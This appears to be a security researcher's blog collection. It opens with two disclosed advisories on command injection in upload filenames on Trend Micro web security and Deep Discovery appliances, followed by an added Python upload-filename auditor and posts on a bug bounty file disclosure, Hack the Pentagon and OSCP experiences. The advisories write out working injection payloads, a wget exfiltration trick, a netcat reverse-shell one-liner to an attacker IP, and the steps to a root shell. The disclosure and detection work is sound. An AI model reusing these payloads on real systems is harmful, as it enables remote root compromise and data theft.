ZDI-16-348: Trend Micro InterScan Web Security ManagePatches filename Remote Code Execution Vulnerability

Version: IWSVA65sp2

Summary:

The com.trend.iwss.gui.servlet.ManagePatches servlet contains a flaw allowing any authenticated user (including ‘Report Only’ users) to execute commands under the context of the root user.

Details:

The com.trend.iwss.gui.servlet.ManagePatches servlet is used by elevated privilege users to upload files (patches). The functionality, however, can be used by any authenticated user simply by substituting their cookie into the request (below is a sample of the stripped down valid request).

POST /servlet/com.trend.iwss.gui.servlet.ManagePatches?action=upload HTTP/1.1
Host: <server IP>:8443
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://<server IP>:8443/admin_patch_mgmt2.jsp?CSRFGuardToken=MQG8WJXIT4J8GASYYA7OVCXXBKUIGG5D
Cookie: JSESSIONID=<INSERT COOKIE VALUE HERE>
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------141658507810329061771972399818
Content-Length: 259

-----------------------------141658507810329061771972399818
Content-Disposition: form-data; name="patchFileName"; filename="test.xml"
Content-Type: text/xml

-----------------------------141658507810329061771972399818--

The actual injection takes place in the name of the file being uploaded. By performing the following two tests, the difference in response delay (roughly 10 versus 30 seconds) indicates that command execution is occurring.

Initial test:

-----------------------------141658507810329061771972399818
Content-Disposition: form-data; name="patchFileName"; filename="test.xml&ping 127.0.0.1 -c 10"
Content-Type: text/xml

Secondary test:

-----------------------------141658507810329061771972399818
Content-Disposition: form-data; name="patchFileName"; filename="test.xml&ping 127.0.0.1 -c 30"
Content-Type: text/xml

This gives any user the ability to execute simple non-interactive commands. However, more complex commands (including a remote shell) are possible.

By issuing a ‘wget <ip>’ of the attacker machine, a response is seen. However, exfiltrating information is a bit more tricky. Special characters like ‘/’, ‘<’ and ‘>’ are not sent across to the server. But by utilizing the environment itself, it becomes possible to insert characters like ‘/’. Below is an example of a user running a wget to retrieve the current user using the given command (where [ip address] is your receiving machine):

Command –

filename="test.xml&wget `echo [ip address]``echo $PATH | cut -c1``id`"

EXPLANATION: using backticks (or even $()) for command substitution, it is possible to pull the ‘/’ character from the current $PATH (its first character) and insert it into the command, producing the full wget request for [ip address]/`id`.

Apache Log – [screenshot not reproduced]

This grants the ability to exfiltrate some data, as well as upload (via wget) files.

Now the attacker has the ability to create a shell by uploading a file containing the following:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip address] 5555 >/tmp/f

To upload the file, the attacker simply names this file ‘shell’, then uploads it using this vulnerability and wget:

test.xml&wget `echo [ip address]``echo $PATH | cut -c1`shell

Once the file has been uploaded (it will be placed in the /var/iwss/patch/bin folder), the attacker can chmod and then execute the file as a script, creating a reverse shell running as root:

test.xml&chmod a+x shell

test.xml&.`echo $PATH | cut -c1`shell

CVE-2016-5840: Trend Micro Deep Discovery hotfix_upload.cgi filename Remote Code Execution Vulnerability

Version: TDA 2.6.1062r1

Summary:

The hotfix_upload.cgi file contains a flaw allowing a user to execute commands under the context of the root user.

Details:

The hotfix_upload.cgi file is used to upload files (hot fixes). Below is a sample of the upload function being used:

POST /cgi-bin/hotfix_upload.cgi?sID=hotfix_temp HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: https://<server IP>/cgi-bin/hotfix_history.cgi
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Content-Type: multipart/form-data; boundary=---------------------------7e0823930136
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: <server IP>
Content-Length: 206
Connection: close
Cache-Control: no-cache
Cookie: session_id=

-----------------------------7e0823930136
Content-Disposition: form-data; name="ajaxuploader_file"; filename="test.txt"
Content-Type: text/plain

a
-----------------------------7e0823930136--

The actual injection takes place in the name of the file being uploaded (i.e. filename="test.txt&id"). By performing the following request, system information is sent back in the response:

[screenshot of the request and response not reproduced]

This gives any user the ability to execute simple non-interactive commands. However, more complex commands (including a remote shell) are possible.

Special characters like ‘/’, ‘<’ and ‘>’ are not sent across to the server. But by utilizing the environment itself, it becomes possible to insert characters like ‘/’. Below is an example of a user using this method to retrieve the /etc/passwd file (NOTE: `echo $PATH | cut -c1` will print ‘/’ into the final command):

[screenshot not reproduced]

Now the attacker has the ability to create a shell by uploading a file containing the following (where [ip address] is your receiving machine):

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip address] 5555 >/tmp/f

To upload the file, the attacker simply names this file ‘shell’, then uploads it using this vulnerability and wget:

test.txt&wget http:`echo $PATH | cut -c1``echo $PATH | cut -c1`[ip]`echo $PATH | cut -c1`shell

Once the file has been uploaded (it will be placed in /opt/TrendMicro/MinorityReport/www/cgi-bin), the attacker can chmod and then execute the file as a script, creating a reverse shell running as root:

test.xml&chmod a+x shell

test.xml&.`echo $PATH | cut -c1`shell

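As an added defender-side example (not code from either advisory or from Trend Micro), the following parses a multipart/form-data upload body, pulls each Content-Disposition filename, lists the shell metacharacters it carries and checks it against the strict allow-list an upload handler should enforce before the name ever reaches a command line. The sample request is constructed from the ManagePatches request shape above; the detector covers both the plain ‘&’ and the backtick-substitution variants the two write-ups use.

```python
"""Added example, not part of either advisory: detect shell metacharacters in
the filename parameter of a multipart upload, the injection vector both
write-ups describe, and apply the allow-list a handler should have enforced.
The sample request below is constructed from the ManagePatches request."""
import re

# Characters that let a "filename" break out into the surrounding shell
# command: separators, command substitution (backticks, $()), pipes,
# redirection, quoting. Both advisories note '/', '<' and '>' never reach the
# server, so do not rely on path characters; '&' and backticks are the tell.
SHELL_META = re.compile(r"[&|;`$(){}<>'\"\\\n]")
# Allow-list for an uploaded patch/hotfix name: a bare base name, no
# separators, limited charset, bounded length. Anything else is rejected.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,127}$")


def parse_multipart(boundary: str, body: bytes) -> list:
    """Minimal multipart/form-data parser: one dict per part holding its
    headers (lower-cased names) and raw content bytes."""
    delim = b"--" + boundary.encode()
    parts = []
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):        # closing delimiter "--boundary--"
            break
        head, _, content = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        parts.append({"headers": headers, "content": content.rstrip(b"\r\n")})
    return parts


def disposition_filename(cd_header: str):
    """Return the quoted filename= parameter of a Content-Disposition value."""
    m = re.search(r';\s*filename="([^"]*)"', cd_header)
    return m.group(1) if m else None


def audit_upload(content_type: str, body: bytes) -> list:
    """One finding per uploaded file: its name, the shell metacharacters it
    contains (empty when clean) and whether it passes SAFE_NAME."""
    boundary = re.search(r"boundary=([^;\s]+)", content_type).group(1)
    findings = []
    for part in parse_multipart(boundary, body):
        fname = disposition_filename(part["headers"].get("content-disposition", ""))
        if fname is None:
            continue
        findings.append({"filename": fname,
                         "shell_meta": sorted(set(SHELL_META.findall(fname))),
                         "allowed": SAFE_NAME.match(fname) is not None})
    return findings


# Constructed sample: the advisory's boundary, one benign part and two parts
# carrying the injected filenames the write-up itself uses as its tests.
BOUNDARY = "-" * 27 + "141658507810329061771972399818"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY


def build_part(filename: bytes) -> bytes:
    return (b"--" + BOUNDARY.encode() + b"\r\n"
            b'Content-Disposition: form-data; name="patchFileName"; filename="'
            + filename + b'"\r\nContent-Type: text/xml\r\n\r\n\r\n')


SAMPLE_BODY = b"".join(build_part(fn) for fn in (
    b"test.xml",
    b"test.xml&ping 127.0.0.1 -c 10",
    b"test.xml&wget `echo [ip address]``echo $PATH | cut -c1``id`",
)) + b"--" + BOUNDARY.encode() + b"--\r\n"
```

Run `audit_upload(CONTENT_TYPE, SAMPLE_BODY)` and only the first part comes back with `allowed` true and an empty `shell_meta` list; the other two are what a WAF rule or upload handler should reject and alert on.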
otx.alienvault.com Local File Disclosure

Those who know me are aware that I partake in bug bounty programs.  Today I’m giving you a brief post on a recent finding and the response/reward received after the submission.

AlienVault had a swag based bug bounty posted, which appears to have gone offline as I can no longer find the page detailing the program.  But while it was live, I decided to take a look since swag based programs are often less examined compared with that of their monetary based brethren.

Within a couple hours I had identified a JSON API by simply altering the unique ID in the URL to that of an invalid ID.  This allowed me to inspect the particular call a little more closely, and that’s where the fun began.

By following this same strategy I was able to find information on other API functions, including one called ‘extract’ (https://otx.alienvault.com/otxapi/extract).

The extract query appeared to be pulling data from a flat file, and creating a CSV from the contents before presenting to the user for download.  Clearly this looked interesting.  I tried a few basic path traversals with no luck, then tried escaping the forward slash…..and….

[screenshot: OTX AlienVault Local File Disclosure]

Uh oh.  Victory for me, red flag for the security team.

I don’t like leaving bugs with this level of severity on the table for even a short period of time.  Reflected XSS, sure I’ll stack a few and send en masse.  But not higher criticality bugs.  So I drafted a rather brief email to the PoC for the bug program, with the above screenshot, and sent it on its way.

I submitted the bug on May 8th, and by the 13th I was notified that the bug had been confirmed and mitigated.  Excellent response time 🙂

With the mitigation I received the following insight into the finding:

By the way, an interesting note on your particular vuln is that we are running inside a container.  We still treat a vuln like this with the highest priority as there are things in that container that are secrets, but for the most part we consider the risk of this vuln largely mitigated by that encapsulation.

This was good to hear as it meant that segmentation was built in.  Good security practice, so kudos there.  Additionally, I’m always happy to see forward thinking companies, like AlienVault, that take a proactive stance to improving security.  Programs like this greatly improve overall security posture, often at a fraction of the cost, and help encourage those of us who want to do the right thing, to do exactly that.

As thanks, AlienVault sent me the following swag bag.

There was actually a second laptop cam cover, but I promptly used it to remove the taped on paper cover I have been using heh.

I plan on wearing the ‘gray hat’ at cons in the future.  Thanks to AlienVault for doing the right thing, and special thanks to Russell Spitler for the quick and friendly responses on the finding!

Hack the Pentagon Top 10

Had to brag a little, because I’m a bit pleased with myself.  The first ever “Hack the Pentagon” bug bounty program kicked off mid April (the 18th?).  I submitted several flaws within the first 24 hours after feeling I had fished out the easy shit.

[screenshot: pentagon top 10]
At the time of the screenshot, I have 8 verified bugs.  You don’t want to know how many duplicates I had (sigh).  Despite this being an ‘invite-only’ private bounty program, there was a lot of media hype and a lot of participation.  The scope was slammed within the first hour.

This is my major ‘gripe’ about bounty programs.  The competition is ridiculous.  The first few days are where the real meat will be found, and the majority of findings are within the first few hours.  This means that whoever sees the program go live, has the best chance.

These programs lack an overall structure that makes it REALLY hard to compete through programs like hackerone and bugcrowd.

I’ll stop whining now.  My goal with the program was to hit the top 10.  Didn’t think I would, but….I’m happy to have been wrong!!!!

An OSCP Review – The OSCP Epic Part 4 – Grand Finale

As of March 12th 2016 I am OSCP certified.  Writing that first sentence was VERY bittersweet.  I stopped doing the lab after the 4th month.  In all I was putting in roughly 25 hours a week into the lab.  The last two week stint I purchased was a huge boon and pushed well into the 30+ machines owned category.

You would think that prepared me for the exam.  But it didn’t, and it won’t prepare you either.  It took me more than one attempt to pass.  And the experience I had taking the exam was frustrating, aggravating, and disgusting.  I realize how negative that sounds, and it’s intentional.

Take the hardest machines in the lab, with all their bullshit CTF style games, and give yourself 24 hours to crack them.  Let me revisit that first part.  The exam machines are CTF style.  This means no real world, realistic flaws.  No.  You are given machines that are deliberately configured such that you have to solve puzzles.

The vulnerabilities WILL BE MODIFIED.  If you see a local file inclusion, expect to have to use it indirectly, or to find a ‘clue file’.  Then use that second part to find a third part.  And the third to find a fourth and maybe, just maybe gain shell access, only to solve a WHOLE NEW SET OF PUZZLES to escalate.

And this is why passing the exam is bitter.  Yes I’m one of the few who now holds the piece of paper.  But what does it mean?  The lab helped get my hands dirty and practice with some real flaws and research.  But was vastly unrealistic.  The exam, was despicable and bizarrely inaccurate for a real world demonstration of skill.

I’ve been doing pen testing and red teaming daily, for 5 years now.  And the exam and lab DO NOT PREPARE YOU FOR THE REAL WORLD.  Let me repeat, THEY DO NOT PREPARE YOU.  Am I saying the real world is crazy hard?  Fuck no!!!!  Popping a targeted user base with phishing, moving laterally until you can get domain admin credentials, shadow copy, etc…..FAR EASIER.

Using known vulnerabilities in a real exercise….you don’t have to find clue files, decipher cryptic files to find hidden directories, etc.  My experience with real engagements is far more closely related to a con game than anything, combined with technical knowledge.

How would/could you test that?  No idea.  But I can tell you one thing, the OSCP will not show you what to expect when you are confronted with a real organization.  Not every box is readily exploitable.  Often you have to rely on skills and tricks that are outside the realm of exploits.  Read: conning users into giving you the credentials you want (drive by downloads, social engineering, pop ups, etc).

I’m going to end my rant and summarize.  Yes I’m now certified.  I can’t say I would ever endorse this cert for real world training.  It will get you jobs that pay a lot of money, but you will have to learn real TTPs crazy fast or lose that very same high paying job for not knowing what to do, when, or how.

It is my solid opinion that the OSCP will set you up for failure in the real world.  If you know little to nothing about pen testing, then the course will help facilitate your education.  But not by teaching you, by giving you a sandbox where you effectively TEACH YOURSELF.

I feel like I just got the CISSP part 2 🙁

An OSCP Review – The OSCP Epic Part 3

I just purchased my third month, and I have mixed feelings about doing so.  I have spent almost 6 weeks (minus 2 out of the 8 for selling my house and moving), averaging almost 20 hours per week.  At this point I have 25 machines fully rooted/system’d, including the ‘gimme’ msf box.  My goal was 24 before taking the exam, but that goal has changed as I discovered my personal weak areas.  That being privilege escalation and modification of binary exploits.

I can say with certainty that web based application hacking experience has carried me far, and fast.  I dropped MANY machines by utilizing web based attack vectors, but have been informed that most machines have multiple avenues of compromise.

Currently, I have all but one network unlocked (dev…wtf?!).  This is a major bone of contention for me.  I have access to the machine that touches the dev network, but haven’t gotten priv esc to unlock the network key.  Why is that frustrating?  Because I have shell, and can…well in the real world I WOULD be able to….access the dev subnet.  But because I haven’t unlocked the subnet, I can’t reset machines, and am having port scans come up dead.

So the try harder adage applies right?  Well, yes, but I have uncovered no less than half a dozen machines that unlock the IT network, and only one that unlocked the admin network, and one that will likely unlock dev.  I find this to be disproportionate, and ridiculous, especially when I find a fucking IT subnet key, on an admin network machine (you have to unlock IT before admin).

So I’m a bit frustrated, and a bit disillusioned.  Having done Red Team exercises and pen testing (professionally) for a few years now, I find some of the lab to be realistic, and other parts nothing more than game play.  There is literally a box where it’s nothing more than a CTF style challenge.  No spoilers, but that one aggravated me on a whole new level, and not because I couldn’t pop it, but because it had no real value other than playing a ‘game’.  It’s not realistic in the slightest.

This leaves me with another month to do the following:

  • Pop a few more boxes (ideally the dev net…sigh)
  • Practice priv esc until I gain a little more comfort
  • Practice exploit modification (essential for the exam)
  • Write my lab report
  • Prep my test report

That’s a tall order for one month, but I’m tired of the ‘game’ aspect of the lab, and really fatigued.  I need to rest, and want the exam done with.  So I will be scheduling it for a few weeks after this month is over.  So I should be taking it sometime before Christmas.  I can’t wait….lol

An OSCP Review – The OSCP Epic Part 2

Haven’t updated in a while, and that’s because I just got my ass kicked (time wise) from moving.  But here is a breakdown of the experience thus far.

Week 1:

I had only evenings (1-2 hours) and Sunday (all day) to devote to the materials, but part of the certification includes doing the exercises in the material.  I felt much of it was busy work and review, but that may be because I have done this kind of thing in live environments professionally.  For most people I would bet the material is pretty overwhelming.  The details are missing in a few places, so without experience it can leave the uninitiated with a lot of homework to do.  BUT, the material was highly relevant.  Using PowerShell as a call back mechanism was discussed.  This was very nice to see, and VERY relevant to modern techniques.

Having said it was almost all review for me, it still took me an entire week to get through.  That being a little over 20 hours of time total.  If this stuff is new, plan to multiply that time out at least to a magnitude of 2 or 3.

Week 2:

This is where it got fun.  Finally.  I had finished the exercises in the materials, and was finally hitting the lab.  Doing the exercises did build a little bit of a base, since they have you do a few things that will get you started.  There were a handful of boxes that fell to a VERY well known exploit.  And in roughly ’67’ seconds I had some proof.txt files.  Then I came to a screeching halt.

I enumerated and enumerated and enumerated.  Researched flaw after flaw and found that the labs are constructed with a lot, and I mean a LOT of red herrings.  So don’t expect a scan and pop scenario.  Those exist, but not by and large.

About the 5th day in, I reverted to what I knew best (web applications) and started smashing.   I popped one more really quickly, then found three more to crush.  Unfortunately moving day arrived and I lost internet connectivity until two days ago.  So I just lost an entire week of lab time.  Extension here I come.  I don’t have 10 boxes yet, but should in the very near future.

A big gripe I had, and maybe I just missed something, is that I unlocked a subnet, but have no idea what the range is.  OK, I know, cheating right?  Except that I have a client side attack into a network, and no idea if it is one I have unlocked.  See the problem?  I could pivot through, but if I haven’t unlocked the subnet, I can’t progress into that area.  There is a mismatch on that goal.  And I may be stymied until I unlock other subnets, even though in the real world I’d be moving along no problem.

And that’s the update.  I’m on week three, and finally able to get back to the lab (though I’m working, so nights and weekends are my limitations).

EDIT: The subnet I unlocked was not visible until I logged in and out of the dashboard.  It did, in fact, coincide with the attack method I discovered so I should be able to pivot into the second network very soon.

An OSCP Review – The OSCP Epic Part 1

After several years of yammering on about how I’m dying to take the course (read “blast the labs”), I have finally taken the plunge and put my money where my mouth is.  I recently landed a few bounties that left me with some capital to spend, and since I’m in between contracts.  Fuck it.  Let’s do it.  So today I signed up.  I’m currently waiting on an email to get started and find my heart pounding with anticipation.

I have known a handful of OSCP holders, and they assure me I should do really well.  Further, I’ve read MANY reviews about the course/labs/exam, and have a strategy in place to expedite the process.

  • Step 1) Course materials.  I will bang through the course materials as quickly as possible.  Although the syllabus looks to be almost all review, there are exercises involved that help with extra points come exam time.  Seeing as I want to pass no matter what, I’m going for every point I can get my hands on.
  • Step 2) Lab time.  I am literally salivating here.  I can’t wait.  My goal is over half the machines in a month (including pivots).  To accomplish this I have devised a strategy to hit the ground running (and in the background as I smash through step 1).  I’m hoping this lands me a couple low hanging fruit and gives me a toe hold into the external network.  Then, loot and pillage.  Loot and pillage.  Loot and pillage.  Rinse repeat.  I’m going to document (make my report) as I go, to further speed up the process of the final report come exam day.
  • Step 3)  The exam.  I’m going to buy a single month, and tack on a second month if need be.  It’s only a $50 dollar savings if I buy the second month up front, but a $200 dollar savings if I don’t, and don’t need it.  I will be compiling my scripts, exploits, and preparing my report beforehand, in hopes that it buys me some extra time.

Some anticipated hurdles and obstacles will likely get in the way.  I have a possible job offer, and starting a new day job could cause me to lose momentum.  Hence the possible second month.  Also, I sold my house and will be moving in a month’s time.  If I can time things well, I will be able to pack and move, and utilize the process as a mental break from the lab, before I review and hit the exam.  But that may not go according to plan, and the second month may be needed.

So there you have it. Time to smash it.  I welcome any words of encouragement, but NO SPOILERS.  I want this, but on my own blood, sweat and tears.  Questions/comments also warmly welcomed!

EDIT: And of course, there was an unforeseen problem.  No one had mentioned to me (or I selectively forgot) that there is a waiting period for the course to begin.  So here I feel all teased up and ready to go, but nope, get ready for the ache to set in, I have to wait until the 29th of this month to get started.  FML.  Two weeks before I can begin?  That’s a gripe right there 🙁

Welcome from the new owner!

this is how i work…seriously

If you are here for finance advice, you are in the wrong place.  Sorry, but this site is under new management.  The internet marketing experiment is over, and now is the time to pursue my true passion(s).  Join me as I follow the white rabbit and build up my presence and career in the tight knit world of cyber security.

Now to get to know me.  I’ve been a hobbyist for a very long time, but only recently delved into the depths of true knowledge.   I now bug/bounty hunt in my personal time (primarily web application vulns), and am teaching myself binary exploitation.  I have a few of the industry certs, one big one that doesn’t need mentioning, and a few lesser known ones like the eCPPT and eWPT.  The OSCP is in my cross-hairs and I am thoroughly excited to take it down!  I plan to document the latter as I go (adhering to NDAs of course), so join me, learn with and from me, and above all, never stop questioning!